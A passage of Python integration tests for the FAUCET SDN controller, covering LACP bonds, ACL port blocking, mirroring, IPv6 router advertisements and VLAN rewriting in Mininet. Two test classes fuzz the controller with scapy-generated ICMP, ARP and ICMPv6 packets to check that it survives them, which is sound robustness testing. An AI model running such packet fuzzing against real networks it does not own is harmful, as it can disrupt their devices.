self.set_port_up(self.port_map['port_%u' % port])
# We have connectivity with two ports.
require_lag_up_ports(2)
require_linux_bond_up()
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
# We have connectivity if that random port goes down.
self.set_port_down(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
class FaucetUntaggedIPv4LACPMismatchTest(FaucetUntaggedIPv4LACPTest):
"""Ensure remote LACP system ID mismatch is logged."""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
for i, bond_member in enumerate(bond_members):
bond = 'bond%u' % i
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member,
('ip link add %s address 0e:00:00:00:00:%2.2x '
'type bond mode 802.3ad lacp_rate fast miimon 100') % (bond, i*2+i),
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond,
'ip link set dev %s master %s' % (bond_member, bond)))
log_file = os.path.join(self.tmpdir, 'faucet.log')
self.wait_until_matching_lines_from_file(r'.+actor system mismatch.+', log_file)
class FaucetUntaggedIPv4ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_ping_fragment_controller(self):
first_host = self.hosts_name_ordered()[0]
first_host.cmd('ping -s 1476 -c 3 %s' % self.FAUCET_VIPV4.ip)
self.one_ipv4_controller_ping(first_host)
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
packets = 1000
fuzz_template = 'python3 -c \"from scapy.all import * ; scapy.all.send(%s, count=%u)\"'
for fuzz_cmd in (
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=0))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=8))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('fuzz(%s(pdst=\'%s\'))' % ('ARP', self.FAUCET_VIPV4.ip), packets)):
fuzz_out = first_host.cmd(mininet_test_util.timeout_cmd(fuzz_cmd, 180))
self.assertTrue(
re.search('Sent %u packets' % packets, fuzz_out), msg='%s: %s' % (
fuzz_cmd, fuzz_out))
self.one_ipv4_controller_ping(first_host)
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(5):
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.flap_all_switch_ports()
class FaucetUntaggedIPv4ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
# Try 64 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4)
# Try 128 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4, size=128)
class FaucetUntaggedIPv6RATest(FaucetUntaggedTest):
FAUCET_MAC = "0e:00:00:00:00:99"
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fe80::1:254/64", "fc00::1:254/112", "fc00::2:254/112", "10.0.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC
CONFIG = """
advertise_interval: 5
""" + CONFIG_BOILER_UNTAGGED
def test_ndisc6(self):
first_host = self.hosts_name_ordered()[0]
for vip in ('fe80::1:254', 'fc00::1:254', 'fc00::2:254'):
self.assertEqual(
self.FAUCET_MAC.upper(),
first_host.cmd('ndisc6 -q %s %s' % (vip, first_host.defaultIntf())).strip())
def test_rdisc6(self):
first_host = self.hosts_name_ordered()[0]
rdisc6_results = sorted(list(set(first_host.cmd(
'rdisc6 -q %s' % first_host.defaultIntf()).splitlines())))
self.assertEqual(
['fc00::1:0/112', 'fc00::2:0/112'],
rdisc6_results)
def test_ra_advertise(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether dst 33:33:00:00:00:01',
'ether src %s' % self.FAUCET_MAC,
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [], timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'ethertype IPv6 \(0x86dd\), length 142',
r'fe80::1:254 > ff02::1:.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s' % (ra_required, tcpdump_txt))
def test_rs_reply(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether src %s' % self.FAUCET_MAC,
'ether dst %s' % first_host.MAC(),
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd(
'rdisc6 -1 %s' % first_host.defaultIntf())],
timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'fe80::1:254 > fe80::.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s (%s)' % (ra_required, tcpdump_txt, tcpdump_filter))
class FaucetUntaggedIPv6ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
for _ in range(5):
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.flap_all_switch_ports()
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
fuzz_success = False
packets = 1000
count = 0
abort = False
def note(*args):
error('%s:' % self._test_name(), *args + tuple('\n'))
# Some of these tests have been slowing down and timing out,
# So this code is intended to allow some debugging and analysis
for fuzz_class in dir(scapy.all):
if fuzz_class.startswith('ICMPv6'):
fuzz_cmd = ("from scapy.all import * ;"
"scapy.all.send(IPv6(dst='%s')/fuzz(%s()),count=%u)" %
(self.FAUCET_VIPV6.ip, fuzz_class, packets))
out, start, too_long = '', time.time(), 30 # seconds
popen = first_host.popen('python3', '-c', fuzz_cmd)
for _, line in pmonitor({first_host: popen}):
out += line
if time.time() - start > too_long:
note('stopping', fuzz_class, 'after >', too_long, 'seconds')
note('output was:', out)
popen.terminate()
abort = True
break
popen.wait()
if 'Sent %u packets' % packets in out:
count += packets
elapsed = time.time() - start
note('sent', packets, fuzz_class, 'packets in %.2fs' % elapsed)
fuzz_success = True
if abort:
break
note('successfully sent', count, 'packets')
self.assertTrue(fuzz_success)
note('pinging', first_host)
self.one_ipv6_controller_ping(first_host)
note('test_fuzz_controller() complete')
class FaucetUntaggedIPv6ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
# Try 64 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6)
# Try 128 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6, size=128)
class FaucetTaggedAndUntaggedDiffVlanTest(FaucetTest):
N_TAGGED = 2
N_UNTAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
native_vlan: 101
%(port_4)d:
native_vlan: 101
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetTaggedAndUntaggedDiffVlanTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=2, n_untagged=2, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_separate_untagged_tagged(self):
tagged_host_pair = self.hosts_name_ordered()[:2]
untagged_host_pair = self.hosts_name_ordered()[2:]
self.verify_vlan_flood_limited(
tagged_host_pair[0], tagged_host_pair[1], untagged_host_pair[0])
self.verify_vlan_flood_limited(
untagged_host_pair[0], untagged_host_pair[1], tagged_host_pair[0])
# hosts within VLANs can ping each other
self.retry_net_ping(hosts=tagged_host_pair)
self.retry_net_ping(hosts=untagged_host_pair)
# hosts cannot ping hosts in other VLANs
self.assertEqual(
100, self.ping([tagged_host_pair[0], untagged_host_pair[0]]))
class FaucetUntaggedACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedEgressACLTest(FaucetUntaggedTest):
REQUIRES_METADATA = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acl_out: 1
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
self.ping_all_when_learned()
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
def test_port5002_notblocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=egress_acl_table)
class FaucetUntaggedDPACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
dp_acls: [1]
""" + CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedNoReconfACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
opstatus_reconf: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
matches = {
'in_port': int(self.port_map['port_1']),
'tcp_dst': 5001,
'eth_type': IPV4_ETH,
'ip_proto': 6}
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_down(self.port_map['port_1'])
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_up(self.port_map['port_1'])
self.ping_all_when_learned()
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
class FaucetUntaggedACLTcpMaskTest(FaucetUntaggedACLTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
# Match packets > 1023
tcp_dst: 1024/1024
actions:
allow: 0
- rule:
actions:
allow: 1
"""
def test_port_gt1023_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(1024, first_host, second_host, mask=1024)
self.verify_tp_dst_notblocked(1023, first_host, second_host, table_id=None)
class FaucetUntaggedVLANACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
actions:
allow: 1
vlans:
100:
description: "untagged"
acl_in: 1
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
class FaucetUntaggedOutputOnlyTest(FaucetUntaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
output_only: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1'])},
table_id=self._VLAN_TABLE,
actions=[])
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertEqual(100.0, self.ping((first_host, second_host)))
self.assertEqual(0, self.ping((third_host, second_host)))
class FaucetUntaggedACLMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
def test_eapol_mirrored(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_eapol_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedOrderedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
- ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetMultiOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetMultiOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
- ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetUntaggedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
vlan_vid: 123
set_fields:
- eth_dst: "06:06:06:06:06:06"
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- vlan_vid: 123
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [123, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [123, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiConfVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMultiConfVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.flap_all_switch_ports()
# Add mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', self.port_map['port_1'],
restart=True, cold_start=False)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
# Remove mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', [],
restart=True, cold_start=False)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
output_only: True
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
ping_pairs = (
(first_host, second_host),
(second_host, first_host))
self.flap_all_switch_ports()
self.change_port_config(
self.port_map['port_3'], 'mirror',
[self.port_map['port_1'], self.port_map['port_2']],
restart=True, cold_start=False, hup=True)
self.verify_ping_mirrored_multi(
